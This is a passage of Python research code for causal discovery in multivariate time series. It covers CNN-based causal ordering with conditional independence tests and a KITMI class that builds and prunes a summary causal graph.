x.columns\n    names_y = x.columns[-d:]\n    y = x[names_y]\n    x = x[names_x]\n\n    summary_names = list(data.columns)\n    temporal_names = dict()\n    for s in range(d):\n        temporal_names[summary_names[s]] = []\n        for o in range(max_lag - 1):\n            i = s + o * d\n            temporal_names[summary_names[s]].append(names_x[i])\n\n    cost_history = []\n    indep_history = []\n    test_indep_history = []\n\n    x_train = x.copy()\n\n    S = list(data.columns)\n    sig = []\n    pa = dict()\n    for name in summary_names:\n        pa[name] = []\n\n    # todo compare each 
time series with its past\n for j in range(d-1):\n # if j != 0:\n # x_train.drop(temporal_names[selected], axis=1, inplace=True)\n # y.drop(y.columns[selected_loc], axis=1, inplace=True)\n # del S[selected_loc]\n criterion = nn.MSELoss()\n model = tsCNN(x_train.shape[1], y.shape[1], max_lag-1).to(device)\n optimizer = optim.Adam(model.parameters(), lr=learning_rate)\n\n n_epochs_stop = 100\n epochs_no_improve = 0\n min_loss = np.inf\n for iter in range(training_epoch + 1):\n # mini_batch_size = 5\n # N = x_train.shape[0] - 2\n # n_batch = N // mini_batch_size + (N % mini_batch_size != 0)\n # i_batch = (iter % N)\n if noise:\n x_train_n = add_noise(x_train.values, d=len(S), order=max_lag)\n else:\n x_train_n = x_train.values.copy()\n x_train_n = pd.DataFrame(x_train_n, columns=x_train.columns)\n\n input_dict = dict()\n for i in range(int(x_train_n.shape[1]/(max_lag-1))):\n input_tensor = torch.tensor(\n x_train_n[temporal_names[S[i]]].values.reshape(-1, max_lag-1, 1), dtype=torch.float,\n device=device)\n input_dict[S[i]] = input_tensor\n # input_tensor = torch.tensor(\n # x_train_n.reshape(-1, x_train_n.shape[1], 1), dtype=torch.float,\n # device=device)\n target_tensor = torch.tensor(\n y.values.reshape(-1, y.shape[1]), dtype=torch.float,\n device=device)\n\n loss = train(input_dict, target_tensor, model, optimizer, criterion)\n if loss < min_loss:\n min_loss = loss\n epochs_no_improve = 0\n else:\n epochs_no_improve = epochs_no_improve + 1\n if iter > 100 and epochs_no_improve == n_epochs_stop:\n if verbose:\n print('Early stopping!')\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n break\n\n if verbose:\n if iter % 250 == 0:\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n\n # loss = train(input_dict, target_tensor, model, optimizer, criterion)\n # if verbose:\n # if iter % 100 == 0:\n # print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n cost_history.append(loss)\n\n # k = d - 1 - j\n test_indep_values = []\n indep_values = []\n c = x_train.copy()\n input_dict = dict()\n for i in range(int(c.shape[1] / (max_lag - 1))):\n input_tensor = torch.tensor(\n c[temporal_names[S[i]]].values.reshape(-1, max_lag - 1, 1), dtype=torch.float,\n device=device)\n input_dict[S[i]] = input_tensor\n # input_tensor = torch.tensor(c.values.reshape(c.shape[0], c.shape[1], 1), dtype=torch.float, device=device)\n res, compact_res, compact_ts_dict = predict(input_dict, model)\n res = res.detach().numpy()\n compact_res = compact_res.detach().numpy()\n for s in range(len(S)):\n # for o in range(order-1):\n # i = s + o*len(S)\n # c[:, i] = np.zeros((x_train.shape[0]))\n e = y.values[:, s] - res[:, s]\n # hs = TestHSIC(kernel='rbf')\n if cond_ind_test == \"ParCorr\":\n hs = TestParCorr()\n elif cond_ind_test == \"CMI\":\n hs = TestMI()\n # pval, val = hs.fit(compact_res, e, c[temporal_names[S[s]]])\n cond = compact_ts_dict[S[s]].detach().numpy()\n pval, val = hs.fit(compact_res, e, cond)\n # pval, val = hs.fit(compact_res, e)\n test_indep_values.append(pval)\n indep_values.append(abs(val))\n # indep_values.append(hs.fit(compact_res.detach().numpy(), e))\n indep_history.append(indep_values)\n test_indep_history.append(test_indep_values)\n # test_indep_array = np.array(test_indep_values).reshape(-1, len(S))\n test_indep_array = pd.DataFrame(np.array(test_indep_values).reshape(-1, len(S)), columns=S, index=[0])\n # indep_array = np.array(indep_values).reshape(-1, len(S))\n indep_array = pd.DataFrame(np.array(indep_values).reshape(-1, len(S)), columns=S, index=[0])\n if 
test_indep_values.count(test_indep_values[0]) == len(test_indep_values):\n            selected = indep_array.idxmin(axis=1).loc[0]\n            if verbose:\n                print(\"since all p-values are the same, we are looking at the statistics...\")\n                print('indeps :' + str(indep_values))\n        else:\n            if verbose:\n                print('test indeps :' + str(test_indep_values))\n            selected = test_indep_array.idxmax(axis=1).loc[0]\n            pval_init = test_indep_array[selected].loc[0]\n        sig.insert(0, selected)\n\n        pa[selected] = summary_names.copy()\n        # pa[S[idp_init]].remove(S[idp_init])\n        for name in sig:\n            pa[selected].remove(name)\n        selected_loc = test_indep_array.columns.get_loc(selected)\n\n        c = x_train.copy()\n\n        print(\"selected:\" +str(selected))\n        print(\"candidate parents\" +str(pa[selected]))\n\n        x_train.drop(temporal_names[selected], axis=1, inplace=True)\n        y.drop(y.columns[selected_loc], axis=1, inplace=True)\n        del S[selected_loc]\n\n    if len(S) == 1:\n        sig[0] = S[0]\n    print(sig)\n\n    end = time.time()\n    discovery_time = end - start\n    print('time causal discovery: '+str(discovery_time))\n\n    print(pa)\n\n    res_unit_array = pd.DataFrame(np.zeros([d, d]), columns=summary_names, index=summary_names, dtype=int)\n    for k in pa.keys():\n        res_unit_array[k].loc[k] = 1\n        temp = pa[k]\n        for i in temp:\n            # if k == i:\n            #     res_unit_array[i].loc[i] = 1\n            # else:\n            if res_unit_array[i].loc[k] == 0:\n                res_unit_array[i].loc[k] = 1\n                res_unit_array[k].loc[i] = 2\n\n    return res_unit_array\n\n\n\n\n# Function to produce noise\ndef add_noise_nbcb_k(x, d, order, beta=0.5):\n    x = x.copy()\n    rand = np.random.randint(0, high=d, size=x.shape[0])\n    for j in range(x.shape[0]):\n        proba = np.random.random(size=1)\n        if proba > beta:\n            # for o in range(order-1):\n            o = order-1\n            i = rand[j] + o*d\n            x[j, i] = 0\n    return x\n\nclass tsCNN_nbcb_k(nn.Module):\n    def __init__(self, input_size, output_size, input_lag):\n        super(tsCNN_nbcb_k, self).__init__()\n        self.input_size = input_size\n        self.output_size = output_size\n        self.input_lag = input_lag\n        self.compact_ts = nn.Linear(input_lag, input_lag)\n        self.compact_in = nn.Linear(int(input_size), input_size)\n        # self.compact_in = nn.Linear(4, 2)\n        self.conv1 = nn.Sequential(\n            nn.Conv1d(\n                in_channels=input_size,\n                out_channels=input_size,  # Some random number\n                kernel_size=5,\n                stride=1,\n                padding=2,\n            ),\n            nn.ReLU(),\n            nn.MaxPool1d(kernel_size=2),  # size after pooling?\n        )\n        self.out = nn.Linear(input_size, output_size)\n\n    def forward(self, x_dict):\n        compact_ts_dict = dict()\n        names = list(x_dict.keys())\n        for name in names:\n            x = x_dict[name].view(-1, self.input_lag)\n            compact_ts_i = self.compact_ts(x)\n            compact_ts_dict[name] = compact_ts_i\n            if name == names[0]:\n                compact_ts = compact_ts_i\n            else:\n                compact_ts = torch.cat((compact_ts, compact_ts_i), 1)\n        compact_in = self.compact_in(compact_ts)\n        x = compact_in.view(-1, self.input_size, 1)\n        x = self.conv1(x)\n        x = x.view(-1, self.input_size)\n        output = self.out(x)\n        return output, compact_in, compact_ts_dict\n\n\ndef nbcb_k(data, max_lag, learning_rate, training_epoch, noise=True, alpha=0.05, cond_ind_test=\"ParCorr\",\n           verbose=True):\n    \"\"\"\n    :param data: input\n    :param max_lag: max_lag\n    :param learning_rate: learning rate of the autoencoder\n    :param training_epoch: number of training epochs\n    :param num_neurons: number of neurons in the hidden layer\n    :param noise: boolean value, if true a denoising autoencoder should be used\n    :param alpha:\n    :param cond_ind_test: CMI or ParCorr\n    :param verbose:\n    :return: dict\n    \"\"\"\n    # Start Causal ordering\n    start = 
time.time()\n\n d = data.shape[1]\n\n x = mts_order(data, order=max_lag) # [:-order]\n # names_x = x.columns[:-d]\n names_x = x.columns\n names_y = x.columns[-d:]\n y = x[names_y]\n x = x[names_x]\n\n summary_names = list(data.columns)\n temporal_names = dict()\n for s in range(d):\n temporal_names[summary_names[s]] = []\n for o in range(max_lag):\n i = s + o * d\n temporal_names[summary_names[s]].append(names_x[i])\n cost_history = []\n indep_history = []\n test_indep_history = []\n\n x_train = x.copy()\n\n S = list(data.columns)\n sig = []\n pa = dict()\n for name in summary_names:\n pa[name] = []\n\n for j in range(d-1):\n criterion = nn.MSELoss()\n model = tsCNN(x_train.shape[1], y.shape[1], max_lag).to(device)\n optimizer = optim.Adam(model.parameters(), lr=learning_rate)\n\n n_epochs_stop = 100\n epochs_no_improve = 0\n min_loss = np.inf\n for iter in range(training_epoch + 1):\n if noise:\n x_train_n = add_noise_nbcb_k(x_train.values, d=len(S), order=max_lag)\n else:\n x_train_n = x_train.values.copy()\n x_train_n = pd.DataFrame(x_train_n, columns=x_train.columns)\n\n input_dict = dict()\n for i in range(int(x_train_n.shape[1]/(max_lag))):\n input_tensor = torch.tensor(\n x_train_n[temporal_names[S[i]]].values.reshape(-1, max_lag, 1), dtype=torch.float,\n device=device)\n input_dict[S[i]] = input_tensor\n target_tensor = torch.tensor(\n y.values.reshape(-1, y.shape[1]), dtype=torch.float,\n device=device)\n\n loss = train(input_dict, target_tensor, model, optimizer, criterion)\n if loss < min_loss:\n min_loss = loss\n epochs_no_improve = 0\n else:\n epochs_no_improve = epochs_no_improve + 1\n if iter > 100 and epochs_no_improve == n_epochs_stop:\n if verbose:\n print('Early stopping!')\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n break\n\n if verbose:\n if iter % 250 == 0:\n print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n\n # loss = train(input_dict, target_tensor, model, optimizer, criterion)\n # if verbose:\n # if iter % 100 == 0:\n # print(\"Epoch \", iter, \"MSE: \", \"{:.4f}\".format(loss, 4))\n cost_history.append(loss)\n\n test_indep_values = []\n indep_values = []\n # k = d - 1 - j\n for s in range(len(S)):\n c = x_train.copy()\n input_dict = dict()\n list_other = []\n for i in range(int(c.shape[1] / (max_lag))):\n if i == s:\n print(temporal_names[S[i]][-1])\n print(c[temporal_names[S[i]]])\n c[temporal_names[S[i]][-1]] = np.zeros((c.shape[0]))\n # c[temporal_names[S[i]]][temporal_names[S[i]]] = np.zeros((len(temporal_names[S[i]])))\n print(c[temporal_names[S[i]]])\n input_tensor = torch.tensor(c[temporal_names[S[i]]].values.reshape(-1, max_lag, 1), dtype=torch.float, device=device)\n input_dict[S[i]] = input_tensor\n else:\n list_other.append(i)\n input_tensor = torch.tensor(c[temporal_names[S[i]]].values.reshape(-1, max_lag, 1), dtype=torch.float, device=device)\n input_dict[S[i]] = input_tensor\n\n res, compact_res, compact_ts_dict = predict(input_dict, model)\n res = res.detach().numpy()\n compact_res = compact_res.detach().numpy()\n e = y.values[:, s] - res[:, s]\n if cond_ind_test == \"ParCorr\":\n hs = TestParCorr()\n elif cond_ind_test == \"CMI\":\n hs = TestMI()\n\n # other = c[temporal_names[S[list_other[0]]]]\n other = compact_ts_dict[S[list_other[0]]].detach().numpy()\n cond = compact_ts_dict[S[s]].detach().numpy()\n\n pval, val = hs.fit(other, e, cond)\n # pval, val = hs.fit(compact_res, e)\n test_indep_values.append(pval)\n indep_values.append(abs(val))\n # indep_values.append(hs.fit(compact_res.detach().numpy(), e))\n 
indep_history.append(indep_values)\n        test_indep_history.append(test_indep_values)\n        # test_indep_array = np.array(test_indep_values).reshape(-1, len(S))\n        test_indep_array = pd.DataFrame(np.array(test_indep_values).reshape(-1, len(S)), columns=S, index=[0])\n        # indep_array = np.array(indep_values).reshape(-1, len(S))\n        indep_array = pd.DataFrame(np.array(indep_values).reshape(-1, len(S)), columns=S, index=[0])\n        if test_indep_values.count(test_indep_values[0]) == len(test_indep_values):\n            selected = indep_array.idxmin(axis=1).loc[0]\n            if verbose:\n                print(\"since all p-values are the same, we are looking at the statistics...\")\n                print('indeps :' + str(indep_values))\n        else:\n            if verbose:\n                print('test indeps :' + str(test_indep_values))\n            selected = test_indep_array.idxmax(axis=1).loc[0]\n        sig.insert(0, selected)\n\n        pa[selected] = summary_names.copy()\n        # pa[S[idp_init]].remove(S[idp_init])\n        for name in sig:\n            pa[selected].remove(name)\n        selected_loc = test_indep_array.columns.get_loc(selected)\n\n        c = x_train.copy()\n\n        print(\"selected:\" +str(selected))\n        print(\"candidate parents\" +str(pa[selected]))\n\n        x_train.drop(temporal_names[selected], axis=1, inplace=True)\n        y.drop(y.columns[selected_loc], axis=1, inplace=True)\n        del S[selected_loc]\n\n    if len(S) == 1:\n        sig[0] = S[0]\n    print(sig)\n\n    end = time.time()\n    discovery_time = end - start\n    print('time causal discovery: '+str(discovery_time))\n\n    print(pa)\n\n    res_unit_array = pd.DataFrame(np.zeros([d, d]), columns=summary_names, index=summary_names, dtype=int)\n    for k in pa.keys():\n        res_unit_array[k].loc[k] = 1\n        temp = pa[k]\n        for i in temp:\n            # if k == i:\n            #     res_unit_array[i].loc[i] = 1\n            # else:\n            if res_unit_array[i].loc[k] == 0:\n                res_unit_array[i].loc[k] = 1\n                res_unit_array[k].loc[i] = 2\n\n    return res_unit_array\n\n\nclass Graph:\n    \"\"\"\n    Graph structure\n    0: no edge\n    1: a tail -\n    2: arrow head ->\n    \"\"\"\n    def __init__(self, d):\n        \"\"\"\n        :param d: number of nodes\n        \"\"\"\n        self.d = d\n        # self.edges = np.subtract(np.ones([n, n]), np.eye(n))\n        self.edges = np.ones([d, d])\n        self.sep = np.zeros([d, d, d])\n\n    def del_edge(self, p, q):\n        \"\"\"\n        :param p: index of a time series\n        :param q: index of a time series\n        \"\"\"\n        self.edges[p, q] = 0\n        self.edges[q, p] = 0\n\n    def add_sep(self, p, q, r):\n        \"\"\"\n        :param p: index of a time series\n        :param q: index of a time series\n        :param r: index of separation set\n        \"\"\"\n        self.sep[p, q, r] = 1\n        self.sep[q, p, r] = 1\n\n    def search_adj(self, p):\n        \"\"\"\n        :param p: index of a time series\n        :return: list of adjacencies of time series p and the number of adjacencies\n        \"\"\"\n        adj_1 = np.argwhere(self.edges[p, :] != 0)\n        adj_2 = np.argwhere(self.edges[:, p] != 0)\n        adj = np.intersect1d(adj_1, adj_2)\n        if self.edges[p, p] == 1:\n            adj = adj[adj != p]\n        num_adj = len(adj)\n        return adj, num_adj\n\n    def search_adj_all(self):\n        \"\"\"\n        :return: list of adjacencies of all time series and the number of adjacencies per time series\n        \"\"\"\n        l_num_adj = []\n        l_adj = []\n        for p in range(self.d):\n            adj, num_adj = self.search_adj(p)\n            l_adj.append(adj.tolist())\n            l_num_adj.append(num_adj)\n        return l_adj, l_num_adj\n\n\nclass RankingList:\n    def __init__(self):\n        self.val = np.array([])\n        self.elem_p = np.array([], dtype='int')\n        self.elem_q = np.array([], dtype='int')\n        self.elem_r = []\n\n    def add(self, p, q, val, r):\n        \"\"\"\n        :param p: index of a time series\n        :param q: index of a time series\n        :param val: value of mutual information\n        :param r: index of set of 
conditionals\n \"\"\"\n self.val = np.append(self.val, val)\n self.elem_p = np.append(self.elem_p, p)\n self.elem_q = np.append(self.elem_q, q)\n self.elem_r.append(r)\n\n def sort(self, descending=True):\n \"\"\"\n :param descending: (bool) sort ascending vs. descending. By default True\n \"\"\"\n idx = np.argsort(self.val)\n if descending:\n idx = np.flip(idx)\n # self.val = self.val[idx]\n # self.elem_p = self.elem_p[idx]\n # self.elem_q = self.elem_q[idx]\n # self.elem_r = self.elem_r[idx]\n self.val = np.take_along_axis(self.val, idx, axis=0)\n self.elem_p = np.take_along_axis(self.elem_p, idx, axis=0)\n self.elem_q = np.take_along_axis(self.elem_q, idx, axis=0)\n sorted_elem_r = []\n for i in idx:\n sorted_elem_r.append(self.elem_r[i])\n self.elem_r = sorted_elem_r\n\n\nclass KITMI:\n def __init__(self, series, sig_lev=0.05, lag_max=5, p_value=True, rank_using_p_value=False, verbose=True, num_processor=-1,\n graphical_optimization=True):\n \"\"\"\n Causal inference (Wrapper) using TMI and CTMI (contain functions for skeleton construction)\n :param series: d-time series (with possibility of different sampling rate)\n :param sig_lev: significance level. By default 0.05\n :param p_value: Use p_value for decision making. By default True\n :param verbose: Print results. By default: True\n :param num_processor: number of processors for parallelization. By default -1 (all)\n \"\"\"\n self.series = series\n self.graph = Graph(series.shape[1])\n\n training_epoch = 1000\n noise = True # d*(order-1)*2\n learning_rate = 0.01\n for i in range(series.shape[1]):\n for j in range(i+1, series.shape[1]):\n data_pair = series[[series.columns[i], series.columns[j]]]\n res_order_pair = tskiko_mv(data_pair, lag_max, learning_rate, training_epoch, noise, sig_lev, \"ParCorr\", verbose)\n if res_order_pair[series.columns[j]].loc[series.columns[i]] == 2:\n self.graph.edges[i, j] = 2\n if res_order_pair[series.columns[i]].loc[series.columns[j]] == 2:\n self.graph.edges[j, i] = 2\n # self.graph.edges = tskiko_mv(self.series[[series.columns[0], series.columns[1]]], lag_max, learning_rate, training_epoch, noise, sig_lev, \"ParCorr\", verbose)\n\n if verbose:\n print(\"Order\")\n print(self.graph.edges)\n\n\n self.series = series\n # # self.graph = Graph(series.shape[1])\n self.n = series.shape[0]\n self.d = series.shape[1]\n self.names = self.series.columns\n self.num_processor = num_processor\n self.p_value = p_value\n self.verbose = verbose\n self.sig_lev = sig_lev\n\n self.adaptive_window = True\n self.graphical_optimization = graphical_optimization\n if self.p_value == rank_using_p_value:\n self.rank_using_p_value = rank_using_p_value\n elif not rank_using_p_value:\n self.rank_using_p_value = rank_using_p_value\n else:\n print(\"Warning: rank_using_p_value can be True iff p_value is True. 
Using rank_using_p_value=False\")\n self.rank_using_p_value = False\n\n self.data_dict = dict()\n self.instantaneous_dict = dict()\n\n self.lags = []\n self.sampling_rate = dict()\n for col in range(series.shape[1]):\n _, s_r = get_sampling_rate(self.series[self.names[col]])\n self.sampling_rate[self.names[col]] = s_r\n\n self.alpha = get_alpha(series)\n\n for col in range(series.shape[1]):\n # self.lags.append(window_size(series[series.columns[col]], alpha=self.alpha, lag_max=lag_max))\n if not self.adaptive_window:\n self.lags.append(1)\n self.data_dict[self.names[col]] = window_representation(self.series[self.names[col]],\n windows_size=self.lags[col])\n self.instantaneous_dict[self.names[col]] = True\n\n if self.adaptive_window:\n self.gamma_matrix, self.window_matrix = self.gamma_matrix_window_matrix(self.series, series.columns)\n else:\n self.gamma_matrix = align_matrix(self.data_dict, series.columns, self.sampling_rate)\n\n self.cap_gamma_df = pd.DataFrame(columns=[\"p\", \"q\", \"r\", \"Grp\", \"Grq\"])\n\n self.mi_array = np.ones([self.graph.d, self.graph.d])\n self.cmi_array = np.ones([self.graph.d, self.graph.d])\n\n if self.verbose:\n print(\"n: \"+str(self.n))\n print(\"d: \"+str(self.d))\n print(\"names: \"+str(self.names))\n print(\"sampling_rate: \"+str(self.sampling_rate))\n print(\"significance level:\"+str(self.sig_lev))\n print(\"alpha:\"+str(self.alpha))\n print(\"window size:\"+str(self.lags))\n print(\"gamma matrix:\"+str(self.gamma_matrix))\n if self.adaptive_window:\n print(\"window matrix\"+str(self.window_matrix))\n print(\"instantaneous dict :\"+str(self.instantaneous_dict))\n print(\"Orderrrr\")\n print(self.graph.edges)\n\n def find_gamma_lambda_x_y(self, x, y, k=10, max_gamma=5):\n gamma_list = list(range(1, max_gamma))\n # todo add windows\n # ws_x_list = list(range(1, max_gamma - 2))\n # ws_y_list = list(range(1, max_gamma - 2))\n ws_x_list = [1]\n ws_y_list = [1]\n\n c = np.zeros([len(gamma_list), len(ws_x_list), len(ws_y_list)])\n\n for idx_g in range(len(gamma_list)):\n for idx_ws_x in range(len(ws_x_list)):\n x_w_rep = window_representation(x, windows_size=ws_x_list[idx_ws_x])\n for idx_ws_y in range(len(ws_y_list)):\n # if ws_x_list[idx_ws_x] == ws_y_list[idx_ws_y] == 1:\n y_w_rep = window_representation(y, windows_size=ws_y_list[idx_ws_y])\n g = gamma_list[idx_g]\n\n if g > 0:\n y_w_rep = y_w_rep[g:]\n x_w_rep = x_w_rep.reset_index(drop=True)\n y_w_rep = y_w_rep.reset_index(drop=True)\n\n x_w_rep = x_w_rep[:-g]\n x_w_rep = x_w_rep.reset_index(drop=True)\n y_w_rep = y_w_rep.reset_index(drop=True)\n m = min(x_w_rep.shape[0], y_w_rep.shape[0])\n x_w_rep = x_w_rep[:m]\n y_w_rep = y_w_rep[:m]\n if len(x_w_rep.shape) == 1:\n x_w_rep = x_w_rep.to_frame()\n if len(y_w_rep.shape) == 1:\n y_w_rep = y_w_rep.to_frame()\n cmi = TestMI(p_value=False)\n _, val = cmi.fit(x_w_rep, y_w_rep)\n\n c[idx_g, idx_ws_x, idx_ws_y] = val\n # else:\n # if ws_x_list[idx_ws_x] != ws_y_list[idx_ws_y]:\n # y_w_rep = window_representation(y, windows_size=ws_y_list[idx_ws_y])\n # g = gamma_list[idx_g]\n # _, val = tmi(x_w_rep, y_w_rep, sampling_rate_tuple, k=k, gamma=g, p_value=False)\n # c[idx_g, idx_ws_x, idx_ws_y] = val\n # else:\n # c[idx_g, idx_ws_x, idx_ws_y] = 0\n\n idx_g, idx_ws_x, idx_ws_y = np.where(c == np.max(c))\n idx_g = idx_g[0]\n idx_ws_x = idx_ws_x[0]\n idx_ws_y = idx_ws_y[0]\n g = gamma_list[idx_g]\n ws_x = ws_x_list[idx_ws_x]\n ws_y = ws_y_list[idx_ws_y]\n return g, ws_x, ws_y\n\n def gamma_matrix_window_matrix(self, series, keys, k=10, max_gamma=5):\n d = 
len(keys)\n g_matrix = np.zeros([d, d], dtype=int)\n window_matrix = np.zeros([d, d], dtype=list)\n\n for i in range(d):\n for j in range(d):\n if i != j:\n x = series[keys[i]]\n y = series[keys[j]]\n g, ws_x, ws_y = self.find_gamma_lambda_x_y(x, y, k=k, max_gamma=max_gamma)\n g_matrix[i, j] = g\n window_matrix[i, j] = [ws_x, ws_y]\n # window_matrix[j, i] = ws_y\n else:\n g_matrix[i, j] = 1\n window_matrix[i, j] = [1, 1]\n # window_matrix[j, i] = 1\n return pd.DataFrame(g_matrix, columns=keys, index=keys), pd.DataFrame(window_matrix, columns=keys, index=keys)\n\n def align_pq(self, x, y, gamma):\n x = x.loc[y.index[0]:]\n\n idx_x = x.index\n idx_y = y.index\n if gamma > 0:\n y = y[gamma:]\n idx_y = idx_y[gamma:]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n idx_x = idx_x[x.index]\n idx_y = idx_y[y.index]\n\n x = x[:-gamma]\n idx_x = idx_x[:-gamma]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n else:\n print(\"Error: gamma <= 0\")\n exit(0)\n\n m = min(x.shape[0], y.shape[0])\n x = x[:m]\n y = y[:m]\n idx_x = idx_x[:m]\n idx_y = idx_y[:m]\n\n if len(x.shape) == 1:\n x = x.to_frame()\n if len(y.shape) == 1:\n y = y.to_frame()\n return x, y, idx_x, idx_y\n\n def find_gamma_z_xy_util(self, x, y, z, k, Gamma, sig_samples=10000, measure=\"cmiknn\"):\n if Gamma > 0:\n x = x[Gamma:]\n y = y[Gamma:]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n z = z.reset_index(drop=True)\n\n z = z[:-Gamma]\n x = x.reset_index(drop=True)\n y = y.reset_index(drop=True)\n z = z.reset_index(drop=True)\n else:\n print(\"Error: Gamma <= 0\")\n exit(0)\n\n m = min(x.shape[0], y.shape[0], z.shape[0])\n x = x[:m]\n y = y[:m]\n z = z[:m]\n\n if len(x.shape) == 1:\n x = x.to_frame()\n if len(y.shape) == 1:\n y = y.to_frame()\n if len(z.shape) == 1:\n z = z.to_frame()\n\n cmi = TestMI(p_value=False)\n _, cmi_val = cmi.fit(x, y, z)\n return cmi_val\n\n def find_gamma_z_xy(self, x, y, z, k, max_gamma=5, measure=\"cmiknn\"):\n z = z.loc[y.index[0]:]\n\n c1 = list()\n\n c1.append(1)\n for G in range(1, max_gamma):\n val = self.find_gamma_z_xy_util(x, y, z, k=k, Gamma=G, measure=measure)\n c1.append(val)\n\n G = np.argmin(c1) + 1\n return G\n\n def align_pqr(self, v_p, v_q, idx_q, r, k):\n\n names_r = [*r.keys()]\n v_r = dict()\n nr_visted = []\n\n for nr in names_r:\n # idx_pq = idx_q\n\n v_p_new = v_p.copy()\n v_q_new = v_q.copy()\n v_p_new.index = idx_q\n v_q_new.index = idx_q\n g = self.find_gamma_z_xy(v_p_new, v_q_new, r[nr], k, max_gamma=5, measure=\"cmiknn\")\n print(\"Gamma = \" + str(g))\n # nr_processed = r[nr]\n\n # xyz_dict = {name_q: v_p_new, nr: nr_processed}\n # xyz_dict[name_q].index = idx_pq\n\n bool_idx = pd.DataFrame([False] * len(idx_q), columns=['bool'])\n bool_idx.index = idx_q\n\n v_q, r_processed, idx_q, _ = self.align_pq(v_q_new, r[nr], g)\n bool_idx.loc[idx_q] = True\n bool_idx = bool_idx['bool'].values\n v_p = v_p[bool_idx]\n # idx_p = idx_p[bool_idx]\n\n for nr_v in nr_visted:\n v_r[nr_v] = v_r[nr_v][bool_idx]\n v_r[nr] = r_processed\n nr_visted.append(nr)\n\n v_p = v_p.reset_index(drop=True)\n v_q = v_q.reset_index(drop=True)\n for nr_v in nr_visted:\n v_r[nr_v] = v_r[nr_v].reset_index(drop=True)\n\n return v_p, v_q, v_r\n\n def causation_entropy(self, p, q, r_list=[], k=10):\n gamma = self.gamma_matrix[self.names[q]].loc[self.names[p]]\n pt_1 = self.series[self.names[p]].copy()\n qt = self.series[self.names[q]].copy()\n pt_1, qt, idx_p, idx_q = self.align_pq(pt_1, qt, gamma)\n\n # qt = q.iloc[1:].values\n # pt_1 = p.iloc[:-1].values\n if 
len(r_list) > 0:\n # rt_1 = r.iloc[:-1].values\n r_1_dict = dict()\n for r_i in r_list:\n r_1_dict[self.names[r_i]] = self.series[self.names[r_i]].copy()\n pt_1, qt, r_1_dict = self.align_pqr(pt_1, qt, idx_q, r_1_dict, k)\n\n # Dict to df\n rt_1 = pd.DataFrame()\n for name in r_1_dict.keys():\n if isinstance(r_1_dict[name], pd.Series):\n r_1_dict[name] = r_1_dict[name].to_frame()\n rt_1[r_1_dict[name].columns] = r_1_dict[name].reset_index(drop=True)\n rt_1 = rt_1.values\n else:\n rt_1 = None\n\n qt = qt.values\n pt_1 = pt_1.values\n\n cmi = TestMI()\n pval, val = cmi.fit(qt, pt_1, rt_1)\n return pval\n\n def causation_entropy_simple(self, p, q, r_list=[], k=10):\n pt_1 = self.series[self.names[p]].copy()\n qt = self.series[self.names[q]].copy()\n\n qt = qt.iloc[1:].values\n pt_1 = pt_1.iloc[:-1].values\n if len(r_list) > 0:\n rt_1 = self.series[self.names[r_list]].copy()\n rt_1 = rt_1.iloc[:-1].values\n\n else:\n rt_1 = None\n\n cmi = TestMI()\n # cmi = TestParCorr()\n pval, val = cmi.fit(qt, pt_1, rt_1)\n return pval\n\n def progressive_removal_of_non_causal_nodes(self):\n if self.verbose:\n print(\"######################################\")\n print(\"Progressive Removal of Non-Causal Nodes\")\n print(\"######################################\")\n\n parents = dict()\n for q in range(self.d):\n parents[self.names[q]] = []\n for p in range(self.d):\n if p != q:\n if self.graph.edges[p, q] == 2:\n parents[self.names[q]].append(self.names[p])\n else:\n parents[self.names[q]].append(self.names[q])\n print(parents)\n\n for q in range(self.d):\n name_q = self.series.columns[q]\n # series_q = self.series[name_q]\n parents_q = parents[name_q].copy()\n for name_p in parents_q:\n p = self.names.tolist().index(name_p)\n parents_q_without_p = list(set(parents[self.series.columns[q]]) - {name_p})\n r_list = []\n for par_name in parents_q_without_p:\n r_list.append(self.names.tolist().index(par_name))\n # series_p = self.series[name_p]\n # series_cond = self.series[parents_q_without_p]\n print(name_p, name_q)\n pval = self.causation_entropy_simple(p, q, r_list)\n if self.verbose:\n print('CE('+name_p+'->'+name_q+'|'+str(parents_q_without_p)+') = '+str(pval))\n if pval > self.sig_lev:\n if self.verbose:\n print('Remove '+name_p+' from parents of '+name_q)\n parents[self.series.columns[q]].remove(name_p)\n self.graph.edges[p, q] = 0\n self.graph.edges[q, p] = 0\n\n\n def fit(self):\n \"\"\"\n run KITMI\n :return: graph (CPDAG)\n \"\"\"\n if self.verbose:\n now = datetime.now()\n print(\"#######################################\")\n print(\"########### Starting KITMI ###########\")\n print(\"########### \" + now.strftime(\"%H:%M:%S\" + \" ###########\"))\n print(\"#######################################\")\n\n # Progressive Removal of Non-Causal Nodes\n self.progressive_removal_of_non_causal_nodes()\n\n if self.verbose:\n print(\"######################################\")\n print(\"Final Results (KITMI)\")\n print(\"######################################\")\n print(\"Summary Graph:\")\n print(self.graph.edges)\n return self.graph.edges\n\n\n def _mi_pq(self, p, q):\n \"\"\"\n estimate tmi between two time series\n :param p: time series with index p\n :param q: time series with index q\n :return: p, q and the estimated value of tmi(p,q)\n \"\"\"\n if self.adaptive_window:\n x = window_representation(self.series[self.names[p]], windows_size=self.window_matrix[self.names[p]].loc[self.names[p]])\n y = window_representation(self.series[self.names[q]], 
windows_size=self.window_matrix[self.names[q]].loc[self.names[q]])\n            print(\"Nodes and windows:\")\n            print(self.names[p], self.window_matrix[self.names[q]].loc[self.names[p]])\n            print(self.names[q], self.window_matrix[self.names[p]].loc[self.names[q]])\n        else:\n            x = self.data_dict[self.names[p]]\n            y = self.data_dict[self.names[q]]\n\n        mi_pval, mi_val = tmi(x, y, sampling_rate_tuple=(self.sampling_rate[self.names[p]],\n                                                         self.sampling_rate[self.names[q]]),\n                              gamma=self.gamma_matrix[self.names[q]].loc[self.names[p]], p_value=self.p_value)\n        # mi_pval, mi_val = ctmi(x, y, None, self.names[p], self.names[q], self.sampling_rate,\n        #                        gamma_matrix=self.gamma_matrix, p_value=self.rank_using_p_value)\n        return p, q, mi_pval\n\n    def skeleton_initialize(self):\n        \"\"\"\n        initialize graph, remove all unconditional 